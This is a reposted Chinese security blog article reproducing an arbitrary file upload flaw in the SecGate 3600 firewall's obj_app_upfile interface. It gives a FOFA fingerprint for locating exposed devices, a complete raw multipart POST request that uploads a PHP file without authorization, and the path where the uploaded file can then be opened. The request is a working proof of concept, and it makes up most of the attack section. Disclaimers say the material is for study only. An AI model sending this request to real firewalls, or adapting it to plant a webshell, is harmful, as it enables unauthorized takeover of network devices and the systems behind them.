网神 SecGate 3600 防火墙任意文件上传漏洞复现

admin 2024年9月29日00:53:18评论34 views字数 1153阅读3分50秒阅读模式

  “ 人性的背后是白云苍狗,愿你我都是生活的高手

声明:文章中涉及的所有内容,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢

网神 SecGate 3600 防火墙任意文件上传漏洞复现

0x01.漏洞概述

 网神 SecGate 3600 防火墙  obj_app_upfile 接口存在任意文件上传漏洞,未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权限。

网神 SecGate 3600 防火墙任意文件上传漏洞复现

0x02.影响范围

网神 SecGate 3600 防火墙

0x03.漏洞复现

FOFA指纹:fid="1Lh1LHi6yfkhiO83I59AYg=="

POC如下

POST /?g=obj_app_upfile HTTP/1.1Host: your-ipAccept-Encoding: gzip, deflateContent-Length: 553Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQcUser-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="MAX_FILE_SIZE"10000000------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="upfile"; filename="test.php"Content-Type: text/plain<?php phpinfo();?>------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="submit_post"obj_app_upfile------WebKitFormBoundaryJpMyThWnAxbcBBQcContent-Disposition: form-data; name="__hash__"0b9d6b1ab7479ab69d9f71b05e0e9445------WebKitFormBoundaryJpMyThWnAxbcBBQc--

构造数据包,发送

网神 SecGate 3600 防火墙任意文件上传漏洞复现

访问上传的文件,如返回404则证明漏洞不存在

https://your-ip/attachements/test.php

网神 SecGate 3600 防火墙任意文件上传漏洞复现

遵守网络安全法,请勿用于非法入侵,仅供学习

原文始发于微信公众号(深白网安):网神 SecGate 3600 防火墙任意文件上传漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月29日00:53:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   网神 SecGate 3600 防火墙任意文件上传漏洞复现https://cn-sec.com/archives/1993945.html

发表评论

匿名网友 填写信息